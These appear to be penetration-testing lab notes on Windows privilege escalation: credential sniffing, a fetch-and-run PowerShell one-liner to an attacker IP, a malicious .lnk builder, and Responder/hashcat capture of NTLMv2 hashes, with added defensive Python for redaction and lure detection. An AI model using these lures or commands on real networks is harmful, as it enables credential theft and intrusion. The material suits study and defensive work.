Interacting with Users
- Once we have exhausted all options, we can look at specific techniques to steal credentials from an unsuspecting user by sniffing their network traffic/local commands or attacking a known vulnerable service requiring user interaction. One of my favorite techniques is placing malicious files around heavily accessed file shares in an attempt to retrieve user password hashes to crack offline later.
Traffic Capture - Wireshark
- If Wireshark is installed, unprivileged users may be able to capture network traffic, as the option to restrict Npcap driver access to Administrators only is not enabled by default.
- Also, suppose our client positions us on an attack machine within the environment. In that case, it is worth running tcpdump or Wireshark for a while to see what types of traffic are being passed over the wire and if we can see anything interesting.
- The tool net-creds can be run from our attack box to sniff passwords and hashes from a live interface or a pcap file. It is worth letting this tool run in the background during an assessment or running it against a pcap to see if we can extract any credentials useful for privilege escalation or lateral movement.
Process Command Lines
Monitoring for Process Command Lines
- Create the script below as procmon1.ps1 on KALI and start the http.server
- Running the monitor script on target:
IEX (iwr 'http://10.10.10.205/procmon.ps1')
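The same command lines the monitor script polls for are what a defender gets in Security event 4688 (with "Include command line in process creation events" enabled) or Sysmon event 1, so the blue-team counterpart of this section is scanning those records for cleartext credentials and redacting them before they are forwarded. The following Python is an added example, not part of the original notes or of procmon.ps1; the event records are constructed, and the regexes cover only a few common argument shapes (net use, 7-Zip -p, schtasks /rp, key=value, URL-embedded credentials), so treat the pattern list as a starting point.

```python
import re

# Constructed sample process-creation records (shape of Security 4688 / Sysmon 1
# fields: subject user + command line). Not real log data.
SAMPLE_EVENTS = [
    {"id": 1, "user": r"WINLPE-SRV01\svc_backup",
     "cmd": r'"C:\Windows\System32\net.exe" use Z: \\fs01\backup /user:backupadm Summer2021!'},
    {"id": 2, "user": r"WINLPE-SRV01\jdoe",
     "cmd": r'"C:\Program Files\7-Zip\7z.exe" a -p"Passw0rd" C:\temp\out.7z C:\temp\in'},
    {"id": 3, "user": r"WINLPE-SRV01\jdoe",
     "cmd": r'"C:\Windows\System32\cmd.exe" /c dir C:\Users'},
    {"id": 4, "user": r"NT AUTHORITY\SYSTEM",
     "cmd": r'"C:\tools\psql.exe" postgresql://app:s3cret@db01:5432/appdb -c "select 1"'},
    {"id": 5, "user": r"WINLPE-SRV01\jdoe",
     "cmd": r'"C:\Windows\System32\schtasks.exe" /create /tn Sync /tr C:\sync.bat /ru svc_sync /rp W1nter2021'},
]

# Argument shapes in which a secret is passed on the command line. Each pattern
# captures the secret itself in the named group "secret".
CRED_PATTERNS = [
    # net use ... /user:NAME PASSWORD  (the bare token after /user:NAME)
    ("net_use_password", re.compile(r"/user:\S+\s+(?P<secret>\S+)", re.I)),
    # generic password=VALUE / pwd:VALUE / secret=VALUE / token=VALUE
    ("key_value_password",
     re.compile(r"(?:pass(?:word|wd)?|pwd|secret|token)\s*[=:]\s*[\"']?(?P<secret>[^\s\"']+)", re.I)),
    # archiver style -pSECRET or -p"SECRET"
    ("dash_p_password", re.compile(r"(?<=\s)-p[\"']?(?P<secret>[^\s\"']+)", re.I)),
    # schtasks /create ... /rp PASSWORD
    ("schtasks_rp", re.compile(r"/rp\s+(?P<secret>\S+)", re.I)),
    # scheme://user:password@host
    ("url_embedded_credentials",
     re.compile(r"[a-z][a-z0-9+.-]*://[^/\s:@]+:(?P<secret>[^@\s]+)@", re.I)),
]


def mask(secret: str) -> str:
    """Keep the first character only, so an analyst can recognise the value without re-logging it."""
    return secret[0] + "*" * (len(secret) - 1) if secret else ""


def find_credentials(events):
    """Return one finding per (event, pattern) hit; the secret is masked in the finding."""
    findings = []
    for ev in events:
        for name, pat in CRED_PATTERNS:
            m = pat.search(ev["cmd"])
            if m:
                findings.append({"id": ev["id"], "user": ev["user"],
                                 "pattern": name, "masked": mask(m.group("secret"))})
    return findings


def redact(cmd: str) -> str:
    """Replace every captured secret with <redacted>, leaving the rest of the command line intact."""
    for _, pat in CRED_PATTERNS:
        def _sub(m):
            s, e = m.span("secret")
            whole = m.group(0)
            return whole[: s - m.start()] + "<redacted>" + whole[e - m.start():]
        cmd = pat.sub(_sub, cmd)
    return cmd


if __name__ == "__main__":
    for f in find_credentials(SAMPLE_EVENTS):
        print(f"event {f['id']}: {f['user']} passed a secret via {f['pattern']} ({f['masked']})")
    print(redact(SAMPLE_EVENTS[0]["cmd"]))
```

Findings are keyed by event id and pattern name so they can be turned into a SIEM alert, while redact() is what you would run on the raw record before it leaves the host; the 7-Zip and net use shapes are the ones that most often leak service-account passwords into audit logs.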
Vulnerable Services
- Docker Desktop Community Edition before 2.1.0.1 - https://medium.com/@morgan.henry.roman/elevation-of-privilege-in-docker-for-windows-2fd8450b478e

SCF on a File Share
Malicious .scf File
- Create a file named @Inventory.scf
- The @ will force the file to be on top when Windows Explorer is opened
- Point to our KALI machine with a random share name and .ico
- Place the file in a share/directory where our target user (eg: ADMIN) might visit
- To search for directories our current user has access to: [18/1/NEEDED COMMANDS]
- Start Responder on KALI:
sudo responder -wrf -v -I tun0
- Wait 2-5 minutes for the "user" to browse the share after starting Responder.
- We'll receive an NTLMv2-SSP hash, e.g.:
NTLMv2-SSP Hash : Administrator::WINLPE-SRV01:815c504e7b06
- Cracking with hashcat (mode 5600 = NetNTLMv2):
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
Capturing Hashes with a Malicious .lnk File
- Using SCFs no longer works on Server 2019 hosts, but we can achieve the same effect using a malicious .lnk file.
- We can use various tools to generate a malicious .lnk file, such as Lnkbomb, as it is not as straightforward as creating a malicious .scf file. We can also make one using a few lines of PowerShell:
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\legit.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()
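Seen from the defender's side, the .scf lure and the .lnk lure in the two sections above share one trait: a file sitting in a share whose embedded target is a UNC path to a host that is not one of the organization's file servers, often a raw IP, plus in the .scf case a leading @ so it sorts to the top of the listing. The following Python is an added example, not part of the original notes or of any tool the notes mention: it walks a share, pulls UNC hosts out of .scf, .lnk and .url files (both ASCII and the UTF-16LE form a real .lnk stores its target in), and flags files pointing at untrusted hosts or raw IPs. The sample share, the host allow-list and the file contents are constructed for the demo; the .lnk samples are not valid shortcut binaries, only the embedded target string wrapped in filler bytes, which is enough to exercise the byte scan.

```python
import re
import tempfile
from pathlib import Path

# File types Explorer resolves (and sends an authentication for) just by listing a folder.
WATCHED_SUFFIXES = {".scf", ".lnk", ".url"}

# \\host\share... as ASCII text (e.g. inside an .scf) and as UTF-16LE (as stored in .lnk string data).
UNC_ASCII = re.compile(rb"\\\\([A-Za-z0-9._-]+)\\")
UNC_UTF16 = re.compile(rb"\\\x00\\\x00((?:[A-Za-z0-9._-]\x00)+)\\\x00")
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def unc_hosts(data: bytes) -> set:
    """Every host named in a UNC reference inside the raw bytes of a file."""
    hosts = {m.group(1).decode("ascii") for m in UNC_ASCII.finditer(data)}
    hosts |= {m.group(1).decode("utf-16-le") for m in UNC_UTF16.finditer(data)}
    return hosts


def classify(path: Path, trusted_hosts: set) -> list:
    """Reasons this file looks like a hash-capture lure; an empty list means nothing suspicious."""
    reasons = []
    for host in sorted(unc_hosts(path.read_bytes())):
        if IPV4.match(host):
            reasons.append(f"UNC target by raw IP: \\\\{host}")
        elif host.lower() not in trusted_hosts:
            reasons.append(f"UNC target on untrusted host: \\\\{host}")
    if path.name.startswith("@"):
        reasons.append("name starts with @ so it sorts to the top of the listing")
    return reasons


def scan_share(root: Path, trusted_hosts: set) -> dict:
    """Map of relative path -> reasons, for every watched file under root that raised a reason."""
    trusted = {h.lower() for h in trusted_hosts}
    findings = {}
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() in WATCHED_SUFFIXES:
            reasons = classify(p, trusted)
            if reasons:
                findings[str(p.relative_to(root))] = reasons
    return findings


def build_sample_share() -> Path:
    """Constructed sample share for the demo; none of these are files from a real engagement."""
    root = Path(tempfile.mkdtemp(prefix="share_"))
    # Lure-shaped .scf: icon path on a raw IP that is not a file server.
    (root / "@Inventory.scf").write_bytes(b"[Shell]\r\nIconFile=\\\\10.10.14.3\\share\\legit.ico\r\n")
    # Lure-shaped .lnk stand-in: UTF-16LE UNC target on an unknown host (not a valid shortcut binary).
    (root / "legit.lnk").write_bytes(
        b"L\x00\x00\x00" + "\\\\unknown-host.example\\@pwn.png".encode("utf-16-le") + b"\x00" * 8)
    # Benign .lnk stand-in: target on the allow-listed file server.
    (root / "Projects").mkdir()
    (root / "Projects" / "Templates.lnk").write_bytes(
        b"L\x00\x00\x00" + "\\\\fs01\\templates\\".encode("utf-16-le"))
    # Benign .url: no UNC reference at all.
    (root / "intranet.url").write_bytes(b"[InternetShortcut]\r\nURL=https://intranet.corp.local/\r\n")
    return root


if __name__ == "__main__":
    share = build_sample_share()
    for rel, reasons in scan_share(share, {"fs01", "fs01.corp.local"}).items():
        print(rel)
        for r in reasons:
            print("  -", r)
```

Run it against a real share by passing the mounted path and your actual file-server names to scan_share(); because the check is a byte scan rather than a shortcut parser, it also catches .lnk files whose target was written by hand rather than through WScript.Shell.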
